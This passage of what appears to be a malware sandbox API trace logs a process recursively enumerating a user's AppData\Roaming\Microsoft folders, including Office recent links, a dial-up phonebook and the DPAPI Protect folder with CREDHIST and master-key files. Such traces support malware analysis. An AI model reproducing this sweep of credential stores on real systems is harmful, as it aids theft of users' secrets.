[0083.201] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="N4CF7XJW" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW" [0083.201] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*" [0083.201] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.203] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.203] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.203] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.203] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.203] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="WIK9MYAA" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA" [0083.203] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*" [0083.203] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.203] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.203] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.203] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.203] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.203] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="ZE5P2FRT" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT" [0083.203] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*" [0083.203] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.204] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.204] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.204] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.204] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.204] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.204] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.204] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.204] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.204] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.204] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.204] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="MMC" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC" [0083.204] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*" [0083.204] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.204] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.204] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.204] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.204] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.204] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="MS Project" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project" [0083.204] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*" [0083.204] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.205] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.205] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.205] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0083.205] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*" [0083.205] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.205] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.205] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.205] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="en-US" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0083.205] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*" [0083.205] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.206] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.206] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.206] PathMatchSpecW (pszFile="Global.MPT", pszSpec="*") returned 1 [0083.206] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.206] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.206] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.206] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.206] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.206] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.206] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.206] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Network" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network" [0083.206] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*" [0083.206] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.206] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.206] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.206] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network", pszFile="Connections" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0083.206] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0083.206] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.207] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.207] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="Pbk" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0083.207] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0083.207] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.207] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.207] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="_hiddenPbk" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0083.207] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0083.207] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.207] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.207] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*") returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.207] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.207] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.207] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.207] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.207] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Office" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office" [0083.207] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*" [0083.207] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.207] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.207] PathMatchSpecW (pszFile="MSO1033.acl", pszSpec="*") returned 1 [0083.207] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.207] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office", pszFile="Recent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0083.207] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0083.208] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.208] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.208] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.208] PathMatchSpecW (pszFile="Database1.LNK", pszSpec="*") returned 1 [0083.208] PathMatchSpecW (pszFile="Global.LNK", pszSpec="*") returned 1 [0083.208] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.208] PathMatchSpecW (pszFile="My Documents.LNK", pszSpec="*") returned 1 [0083.208] PathMatchSpecW (pszFile="receipt-parcel-UK980-456.LNK", pszSpec="*") returned 1 [0083.208] PathMatchSpecW (pszFile="Templates.LNK", pszSpec="*") returned 1 [0083.208] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.209] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.209] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="OneNote" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote" [0083.209] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*" [0083.209] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.209] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="16.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0" [0083.210] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*" [0083.210] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.210] PathMatchSpecW (pszFile="Preferences.dat", pszSpec="*") returned 1 [0083.210] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.210] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.210] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Outlook" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook" [0083.210] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0083.210] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.211] PathMatchSpecW (pszFile="Outlook.srs", pszSpec="*") returned 1 [0083.211] PathMatchSpecW (pszFile="Outlook.xml", pszSpec="*") returned 1 [0083.211] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.211] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="PowerPoint" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint" [0083.211] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*" [0083.211] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.211] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.211] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Proof" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof" [0083.211] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*" [0083.211] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.212] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.212] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Protect" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect" [0083.212] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*" [0083.212] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.212] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*") returned 1 [0083.212] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-2345716840-1148442690-1481144037-1000" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000" [0083.212] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*" [0083.212] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.212] PathMatchSpecW (pszFile="1862f3be-4467-4925-a93f-badcfb2203ba", pszSpec="*") returned 1 [0083.212] PathMatchSpecW (pszFile="1a231b4e-0d4b-4bef-bfe5-101dc3660c19", pszSpec="*") returned 1 [0083.212] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0083.212] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.212] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-3111613574-2524581245-2586426736-500" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" [0083.212] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") 